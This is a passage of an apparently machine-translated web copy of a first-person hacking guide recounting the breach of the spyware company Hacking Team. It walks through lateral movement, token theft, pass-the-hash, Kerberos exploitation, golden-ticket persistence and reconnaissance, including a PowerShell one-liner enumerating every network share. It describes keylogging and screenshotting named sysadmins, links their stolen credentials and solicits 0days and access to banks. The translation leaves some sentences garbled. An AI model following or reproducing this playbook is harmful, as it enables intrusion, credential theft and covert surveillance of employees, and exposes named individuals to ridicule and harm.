  570. dodge antivirus, and leave few traces).
  571. 4) Scheduled Tasks
  572. You can run remote programs at and schtasks [5]. It works on the
  573. psexec same situations, and also leaves traces known [12].
  574. 5) GPO
  575. If all these protocols are disabled or blocked by
  576. firewall, once you are the domain administrator, you can use GPO
  577. to give a logon script, install a msi, run a scheduled task
  578. [13], or as we shall see computer Mauro Romeo (sysadmin Hacking
  579. Team), enable WMI and open the firewall via GPO.
  580. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
  581. [2] https://sourceforge.net/projects/winexe/
  582. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
  583. [4] http://www.powershellempire.com/?page_id=523
  584. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  585. [6] https://github.com/byt3bl33d3r/pth-toolkit
  586. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
  587. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
  588. [9] http://www.powershellempire.com/?page_id=124
  589. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
  590. [11] https://adsecurity.org/?p=2277
  591. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
  592. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
  593. Movement "in situ"
  594. 1) Impersonalizando Tokens
  595. Once you have administrative access to a computer, you can use the
  596. tokens of other users to access resources in the domain. Two
  597. tools to do this are incognito [1] and commands token :: * of
  598. mimikatz [2].
  599. 2) MS14-068
  600. You can take advantage of a validation failure kerberos to generate a
  601. ticket domain administrator [3] [4] [5].
  602. 3) Pass the Hash
  603. If you have your hash but the user has not logged on you can use
  604. sekurlsa :: pth [2] for a ticket user.
  605. 4) Injection Process
  606. Any RAT can be injected to another process, for example the command
  607. pupy migrate in meterpreter and [6] or psinject [7] in powershell empire.
  608. You can inject the process with the token you want.
  609. 5) runes
  610. This is sometimes very useful because it does not require privileges
  611. administrator. The command is part of windows, but if you have no interface
  612. Graphics can use powershell [8].
  613. [1] https://www.indetectables.net/viewtopic.php?p=211165
  614. [2] https://adsecurity.org/?page_id=1821
  615. [3] https://github.com/bidord/pykek
  616. [4] https://adsecurity.org/?p=676
  617. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
  618. [6] https://github.com/n1nj4sec/pupy
  619. [7] http://www.powershellempire.com/?page_id=273
  620. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
  621. ---- [13.2 - Persistence] ----------------------------------------- ------------
  622. Having gained access, you want to keep. Indeed, the persistence
  623. It's just a challenge for motherfuckers like they want Hacking Team
  624. hack activists or other individuals. Companies to hack, it goes
  625. persistence because companies never sleep. I always use "persistence"
  626. Duqu style 2 run in RAM on a pair of servers with high
  627. uptime percentages. In the unlikely event that all restarted at a time,
  628. I have a ticket passwords and gold [1] to access booking. You can read
  629. more information on persistence mechanisms for windows here
  630. [2. 3. 4]. But to hack into companies, you do not need and increases the risk of
  631. detection.
  632. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
  633. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
  634. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
  635. [4] https://blog.netspi.com/tag/persistence/
  636. ---- [13.3 - Internal Recognition] ---------------------------------------- ---
  637. The best tool for understanding today Windows is Powerview networks [1].
  638. Worth reading everything written by the author [2] above all [3], [4], [5] and
  639. [6]. Powershell itself is also very powerful [7]. As there are still many
  640. 2003 and 2000 servers without powershell, you must also learn the old
  641. school [8], with tools like netview.exe [9] or the command windows
  642. "Net view". Other techniques that I like are:
  643. 1) Download a list of file names
  644. With a domain administrator account, you can download all
  645. file names on the network with powerview:
  646. Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ |
  647. select-string '^ (. *) \ t' | % {$ _ Matches -recurse dir [0] .Groups [1]. |
  648. select fullname | files.txt -append out-file}
  649. Later, you can read at your own pace and choose which ones you want to download.
  650. 2) Read post
  651. As we have seen, you can be downloaded emails with powershell, and have
  652. lots of useful information.
  653. 3) Read sharepoint
  654. It is another place where many companies have important information. It can
  655. download with powershell [10].
  656. 4) Active Directory [11]
  657. It has lots of useful information about users and computers. Without being
  658. domain administrator, and you can find lots of information
  659. powerview and other tools [12]. After getting manager
  660. domain should export all the information of AD with csvde or other
  661. tool.
  662. 5) Spying on employees
  663. One of my favorite pastimes is hunting the sysadmins. spying
  664. Christan Pozzi (sysadmin Hacking Team) got the server accesso
  665. Nagios gave me accessibility to sviluppo rete (network development in
  666. RCS source code). With a simple combination of Get-Keystrokes and
  667. Get-TimedScreenshot of PowerSploit [13], Do-Exfiltration of Nishang [14], and
  668. GPO, you can spy on any employee or even the entire domain.
  669. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  670. [2] http://www.harmj0y.net/blog/tag/powerview/
  671. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  672. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
  673. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  674. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
  675. [7] https://adsecurity.org/?p=2535
  676. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
  677. [9] https://github.com/mubix/netview
  678. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
  679. [11] https://adsecurity.org/?page_id=41
  680. [12] http://www.darkoperator.com/?tag=Active+Directory
  681. [13] https://github.com/PowerShellMafia/PowerSploit
  682. [14] https://github.com/samratashok/nishang
  683. - [14 - Hunting Sysadmins] ------------------------------------------ ----------
  684. By reading the documentation of its infrastructure [1], I realized that even I
  685. lacked access to something important - "Rete Sviluppo" an isolated network
  686. keeps all the RCS source code. Sysadmins of a company always
  687. They have access to everything. I searched computers Mauro Romeo and Christian
  688. Pozzi to see how they handle the network sviluppo, and to see if there were other
  689. interesting systems should investigate. It was easy to access your
  690. computers since they were part of the Windows domain that had
  691. administrator. Mauro computer Romeo had no open port,
  692. so I opened the port of WMI [2] to execute meterpreter [3]. In addition to
  693. record catches with keys and Get-Keystrokes and Get-TimedScreenshot, used many
  694. modules / gather / metasploit, CredMan.ps1 [4], and searched files [5]. seeing
  695. that Pozzi had a Truecrypt volume, I waited until he had assembled to
  696. then copy the files. Many have laughed weak passwords
  697. Christian Pozzi (Christian Pozzi and generally provides enough material
  698. for comedy [6] [7] [8] [9]). I included them in filtration as an oversight and
  699. to laugh at him. The reality is that mimikatz and keyloggers see all
  700. same passwords.
  701. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
  702. [2] http://www.hammer-software.com/wmigphowto.shtml
  703. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
  704. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
  705. [5] http://pwnwiki.io/#!presence/windows/find_files.md
  706. [6] http://archive.is/TbaPy
  707. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
  708. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
  709. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
  710. - [15 - The Bridge] ------------------------------------------ ------------------
  711. Within the volume encryption Christian Pozzi, there was a textfile with many
  712. passwords [1]. One was for a Nagios server Fully Automated,
  713. I had access to sviluppo network to monitor it. Had found
  714. the bridge. Only had the password for the Web interface, but there was a
  715. Public exploit [2] to execute code and get a shell (is an exploit
  716. unauthenticated, but it takes a user has logged in to the
  717. I used that password textfile).
  718. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
  719. [2] http://seclists.org/fulldisclosure/2014/Oct/78
  720. - [16 - Reusing and restoring passwords] ----------------------------
  721. Reading the post, he had seen Milan Daniele granting access to
  722. git repositories. And I had its windows password by mimikatz. The
  723. I tried with git server and it worked. I tried sudo and it worked. For him
  724. gitlab server and your twitter account, I used the "I forgot my
  725. Password "and my access to the mail server to restore
  726. password.
  727. - [17 - Conclusion] ------------------------------------------- ----------------
  728. It is done. So easy it is to tear down a company and stop their abuses
  729. human rights. That is the beauty and the asymmetry of hacking: with only a hundred
  730. hours of work, one person can undo years of work of a
  731. multimillion-dollar company. The hacking gives us the possibility of the dispossessed
  732. fight and win.
  733. Hacking guides often end with a warning: This information is
  734. only for educational purposes, I am an ethical hacker, not attacks on computers without
  735. permission, gobbledygook. I will say the same, but with a more rebellious concept
  736. hacking "ethical". Filter ethical hacking documents would expropriate money
  737. banks, and protect computers of ordinary people. However, the
  738. Most people who call themselves "ethical hackers" work only
  739. to protect those who pay their consulting fee, which often are the
  740. they most deserve to be hacked.
  741. Hacking Team is see themselves as part of a tradition of inspiring
  742. Italian [1] design. I see them Vincenzetti, your company, and their cronies
  743. police, police, and government, as part of a long tradition of
  744. Italian fascism. I want to dedicate this guide to the victims of the assault on the
  745. Armando Diaz school, and all those who have shed their blood on hands
  746. Italian fascists.
  747. [1] https://twitter.com/coracurrier/status/618104723263090688
  748. - [18 - Contact] ------------------------------------------- ------------------
  749. To send spearphishing attempts, death threats written in
  750. Italian [1] [2] and to give me 0days or access within banks,
  751. corporations, governments etc.
  752. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
  753. [2] https://twitter.com/CthulhuSec/status/619459002854977537
  754. porfa only encrypted mails:
  755. https://securityinabox.org/es/thunderbird_usarenigmail
  756. -----BEGIN PGP PUBLIC KEY BLOCK-----
  757. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
  758. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
  759. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
  760. +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
  761. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
  762. Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
  763. Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
  764. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
  765. QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
  766. cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
  767. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
  768. 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
  769. X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
  770. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
  771. oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
  772. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
  773. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
  774. WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
  775. jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
  776. CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
  777. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
  778. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
  779. JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
  780. Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
  781. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
  782. =E5+y
  783. -----END PGP PUBLIC KEY BLOCK-----
  784. If not you, who? If not now, when?
  785. _ _ _ ____ _ _
  786. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  787. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  788. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  789. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  790. </code> </pre>
  791. </p>
  792. </div>
  793. </div>
  794. <hr>
  795. <footer>
  796. <p>CC BY-NC</p>
  797. </footer>
  798. </div> <!-- /container -->
  799. <!-- Le javascript
  800. ================================================== -->
  801. <!-- Placed at the end of the document so the pages load faster -->
  802. <script src="js/jquery.js"></script>
  803. <script src="js/bootstrap-386.js"></script>
  804. <script src="js/bootstrap-transition.js"></script>
  805. <script src="js/bootstrap-alert.js"></script>
  806. <script src="js/bootstrap-modal.js"></script>
  807. <script src="js/bootstrap-dropdown.js"></script>
  808. <script src="js/bootstrap-scrollspy.js"></script>
  809. <script src="js/bootstrap-tab.js"></script>
  810. <script src="js/bootstrap-tooltip.js"></script>
  811. <script src="js/bootstrap-popover.js"></script>
  812. <script src="js/bootstrap-button.js"></script>
  813. <script src="js/bootstrap-collapse.js"></script>
  814. <script src="js/bootstrap-carousel.js"></script>
  815. <script src="js/bootstrap-typeahead.js"></script>
  816. <script src="js/bootstrap-affix.js"></script>
  817. <script>
  818. _386 = { onePass: true, speedFactor: 0.825 };
  819. </script>
  820. </body>
  821. </html>